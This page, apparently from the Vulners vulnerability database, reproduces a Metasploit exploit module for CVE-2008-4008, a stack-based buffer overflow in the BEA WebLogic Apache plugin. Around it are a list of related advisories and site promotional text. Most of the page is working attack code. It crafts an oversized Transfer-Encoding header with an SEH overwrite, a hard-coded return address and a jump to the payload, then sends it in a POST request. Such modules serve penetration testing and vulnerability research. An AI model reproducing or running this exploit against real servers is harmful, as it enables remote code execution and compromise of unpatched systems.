Vulners
Lucene search
BEA Weblogic - Transfer-Encoding Buffer Overflow (Metasploit)
| Reporter | Title | Published | Views | Family All 19 |
|---|---|---|---|---|
 | CVE-2008-4008 | 8 Jul 201000:00 | – | circl |
 | Oracle BEA WebLogic Server Apache Connector Buffer Overflow (CVE-2008-4008) | 17 Dec 200900:00 | – | checkpoint_advisories |
 | CVE-2008-4008 | 14 Oct 200821:00 | – | cve |
 | CVE-2008-4008 | 14 Oct 200821:00 | – | cvelist |
 | BEA Weblogic Transfer-Encoding Buffer Overflow | 22 Oct 200817:51 | – | metasploit |
 | CVE-2008-4008 | 14 Oct 200821:11 | – | nvd |
 | CPU Jan 2009 | 13 Jan 200900:00 | – | oracle |
| CPUOct2008 Advisory | 14 Oct 200800:00 | – | oracle |
 | BEA Weblogic Transfer-Encoding Buffer Overflow | 26 Nov 200900:00 | – | packetstorm |
 | Stack overflow | 14 Oct 200821:11 | – | prion |
10
##
# $Id: bea_weblogic_transfer_encoding.rb 9744 2010-07-08 23:34:50Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
HttpFingerprint = { :pattern => [ /Apache/ ] }
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'BEA Weblogic Transfer-Encoding Buffer Overflow',
'Description' => %q{
This module exploits a stack based buffer overflow in the BEA
Weblogic Apache plugin. This vulnerability exists in the
error reporting for unknown Transfer-Encoding headers.
You may have to run this twice due to timing issues with handlers.
},
'Author' => 'pusscat',
'Version' => '$Revision: 9744 $',
'References' =>
[
[ 'CVE', '2008-4008' ],
[ 'OSVDB', '49283' ],
[ 'URL', 'http://support.bea.com/application_content/product_portlets/securityadvisories/2806.html'],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'seh',
},
'Privileged' => true,
'Platform' => 'win',
'Payload' =>
{
'Space' => 500,
'BadChars' => "\x00\x0d\x0a",
'StackAdjustment' => -1500,
},
'Targets' =>
[
[ 'Windows Apache 2.2 version Universal',
{
'Ret' => 0x1001f4d6, #pop/pop/ret
}
],
],
'DisclosureDate' => 'Sept 09 2008',
'DefaultTarget' => 0))
end
def exploit
sploit = rand_text_alphanumeric(5800)
sploit[5781, 8] = generate_seh_record(target.ret)
# Jump backward to the payload
sploit[5789, 5] = "\xe9\x5e\xe9\xff\xff"
sploit[0, payload.encoded.length+7] = make_nops(7) + payload.encoded
datastore['VHOST'] = 'localhost'
send_request_cgi(
{
'method' => 'POST',
'url' => '/index.jsp',
'data' => '',
'headers' =>
{
'Transfer-Encoding' => sploit
}
})
handler
end
endData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
08 Jul 2010 00:00Current
7High risk
Vulners AI Score7
CVSS 210
EPSS0.85806